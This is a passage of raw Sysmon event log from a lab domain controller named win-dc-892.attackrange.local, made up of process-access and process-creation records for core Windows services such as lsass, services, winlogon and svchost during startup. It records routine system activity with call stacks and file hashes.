Manager\DWM-1{266CAFBE-646C-6064-8AC4-000000000000}0xc48a1SystemMD5=C89F159A577F19F7F03C73C98D29D841,SHA256=B3E37997C1C62DD90D69EF83D6A6FC782BF9A5B8AD04A0D1528A8B7FA31AA408,IMPHASH=DDB7DE3741333EE031929A760FCD4542{266CAFBE-646A-6064-0900-00000000AE01}788C:\Windows\System32\winlogon.exewinlogon.exe 10341000x80000000000000001135Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:44.674{266CAFBE-6469-6064-0500-00000000AE01}624640C:\Windows\system32\csrss.exe{266CAFBE-646C-6064-1300-00000000AE01}1228C:\Windows\System32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000001134Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:44.674{266CAFBE-646A-6064-0A00-00000000AE01}8401184C:\Windows\system32\services.exe{266CAFBE-646C-6064-1300-00000000AE01}1228C:\Windows\System32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|C:\Windows\system32\services.exe+307d|C:\Windows\system32\services.exe+6334|C:\Windows\system32\services.exe+dc24|C:\Windows\system32\services.exe+d248|C:\Windows\system32\services.exe+4d0c|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001133Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:44.674{266CAFBE-646A-6064-0B00-00000000AE01}856888C:\Windows\system32\lsass.exe{266CAFBE-646A-6064-0900-00000000AE01}788C:\Windows\system32\winlogon.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+10d9e|C:\Windows\system32\lsasrv.dll+1d1e8|C:\Windows\system32\lsasrv.dll+1c411|C:\Windows\system32\lsasrv.dll+1b160|C:\Windows\system32\lsasrv.dll+2706b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001132Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:44.674{266CAFBE-646A-6064-0B00-00000000AE01}856888C:\Windows\system32\lsass.exe{266CAFBE-646A-6064-0900-00000000AE01}788C:\Windows\system32\winlogon.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+10d9e|C:\Windows\system32\lsasrv.dll+1d1e8|C:\Windows\system32\lsasrv.dll+1c411|C:\Windows\system32\lsasrv.dll+1ac30|C:\Windows\system32\lsasrv.dll+2706b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001131Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:44.674{266CAFBE-646A-6064-0B00-00000000AE01}856888C:\Windows\system32\lsass.exe{266CAFBE-646A-6064-0900-00000000AE01}788C:\Windows\system32\winlogon.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+10d9e|C:\Windows\system32\lsasrv.dll+19616|C:\Windows\system32\lsasrv.dll+1abbf|C:\Windows\system32\lsasrv.dll+2706b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001130Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:44.674{266CAFBE-646A-6064-0B00-00000000AE01}8561016C:\Windows\system32\lsass.exe{266CAFBE-646A-6064-0A00-00000000AE01}840C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+10d9e|C:\Windows\system32\lsasrv.dll+1d1e8|C:\Windows\system32\lsasrv.dll+1c411|C:\Windows\system32\lsasrv.dll+1ac30|C:\Windows\system32\lsasrv.dll+2706b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001129Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:44.674{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-646A-6064-0B00-00000000AE01}856C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f86b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001128Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:44.674{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-646A-6064-0B00-00000000AE01}856C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f71b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001127Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:44.674{266CAFBE-646A-6064-0B00-00000000AE01}8561016C:\Windows\system32\lsass.exe{266CAFBE-646A-6064-0A00-00000000AE01}840C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+1a18d|C:\Windows\system32\lsasrv.dll+2706b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001126Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:44.659{266CAFBE-6469-6064-0500-00000000AE01}624640C:\Windows\system32\csrss.exe{266CAFBE-646C-6064-1200-00000000AE01}1196C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000001125Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:44.659{266CAFBE-6469-6064-0500-00000000AE01}6241132C:\Windows\system32\csrss.exe{266CAFBE-646C-6064-1100-00000000AE01}1200C:\Windows\System32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000001124Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:44.659{266CAFBE-646A-6064-0A00-00000000AE01}8401108C:\Windows\system32\services.exe{266CAFBE-646C-6064-1200-00000000AE01}1196C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|C:\Windows\system32\services.exe+307d|C:\Windows\system32\services.exe+6334|C:\Windows\system32\services.exe+ddc1|C:\Windows\system32\services.exe+d3ee|C:\Windows\system32\services.exe+4d0c|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001123Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:44.659{266CAFBE-646A-6064-0A00-00000000AE01}8401100C:\Windows\system32\services.exe{266CAFBE-646C-6064-1100-00000000AE01}1200C:\Windows\System32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|C:\Windows\system32\services.exe+307d|C:\Windows\system32\services.exe+6334|C:\Windows\system32\services.exe+dc24|C:\Windows\system32\services.exe+d3ee|C:\Windows\system32\services.exe+4d0c|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000001122Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:44.669{266CAFBE-646C-6064-1200-00000000AE01}1196C:\Windows\System32\svchost.exe10.0.14393.0 (rs1_release.160715-1616)Host Process for Windows ServicesMicrosoft® Windows® Operating SystemMicrosoft Corporationsvchost.exeC:\Windows\system32\svchost.exe -k LocalServiceC:\Windows\system32\NT AUTHORITY\LOCAL SERVICE{266CAFBE-646C-6064-E503-000000000000}0x3e50SystemMD5=36F670D89040709013F6A460176767EC,SHA256=438B6CCD84F4DD32D9684ED7D58FD7D1E5A75FE3F3D12AB6C788E6BB0FFAD5E7,IMPHASH=2CED93915677390B76EE1916B92F3EF6{266CAFBE-646A-6064-0A00-00000000AE01}840C:\Windows\System32\services.exeC:\Windows\system32\services.exe 10341000x80000000000000001121Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:44.659{266CAFBE-646A-6064-0A00-00000000AE01}8401136C:\Windows\system32\services.exe{266CAFBE-646C-6064-0F00-00000000AE01}1116C:\Windows\System32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\services.exe+1713f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001120Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:44.659{266CAFBE-646A-6064-0A00-00000000AE01}8401136C:\Windows\system32\services.exe{266CAFBE-646C-6064-1000-00000000AE01}1124C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\services.exe+1713f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001119Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:44.659{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-0F00-00000000AE01}1116C:\Windows\System32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001118Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:44.659{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-1000-00000000AE01}1124C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001117Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:44.643{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-646A-6064-0900-00000000AE01}788C:\Windows\system32\winlogon.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001116Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:44.643{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-646A-6064-0900-00000000AE01}788C:\Windows\system32\winlogon.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001115Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:44.643{266CAFBE-6469-6064-0500-00000000AE01}624640C:\Windows\system32\csrss.exe{266CAFBE-646C-6064-1000-00000000AE01}1124C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000001114Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:44.643{266CAFBE-646A-6064-0A00-00000000AE01}840920C:\Windows\system32\services.exe{266CAFBE-646C-6064-1000-00000000AE01}1124C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|C:\Windows\system32\services.exe+307d|C:\Windows\system32\services.exe+6334|C:\Windows\system32\services.exe+dc24|C:\Windows\system32\services.exe+d248|C:\Windows\system32\services.exe+4d0c|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001113Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:44.643{266CAFBE-6469-6064-0500-00000000AE01}624740C:\Windows\system32\csrss.exe{266CAFBE-646C-6064-0F00-00000000AE01}1116C:\Windows\System32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000001112Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:44.643{266CAFBE-646A-6064-0A00-00000000AE01}840932C:\Windows\system32\services.exe{266CAFBE-646C-6064-0F00-00000000AE01}1116C:\Windows\System32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|C:\Windows\system32\services.exe+307d|C:\Windows\system32\services.exe+6334|C:\Windows\system32\services.exe+dc24|C:\Windows\system32\services.exe+d248|C:\Windows\system32\services.exe+4d0c|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000001111Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:44.649{266CAFBE-646C-6064-0F00-00000000AE01}1116C:\Windows\System32\svchost.exe10.0.14393.0 (rs1_release.160715-1616)Host Process for Windows ServicesMicrosoft® Windows® Operating SystemMicrosoft Corporationsvchost.exeC:\Windows\System32\svchost.exe -k termsvcsC:\Windows\system32\NT AUTHORITY\NETWORK SERVICE{266CAFBE-646C-6064-E403-000000000000}0x3e40SystemMD5=36F670D89040709013F6A460176767EC,SHA256=438B6CCD84F4DD32D9684ED7D58FD7D1E5A75FE3F3D12AB6C788E6BB0FFAD5E7,IMPHASH=2CED93915677390B76EE1916B92F3EF6{266CAFBE-646A-6064-0A00-00000000AE01}840C:\Windows\System32\services.exeC:\Windows\system32\services.exe 10341000x80000000000000001110Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:44.643{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-646A-6064-0B00-00000000AE01}856C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f86b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001109Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 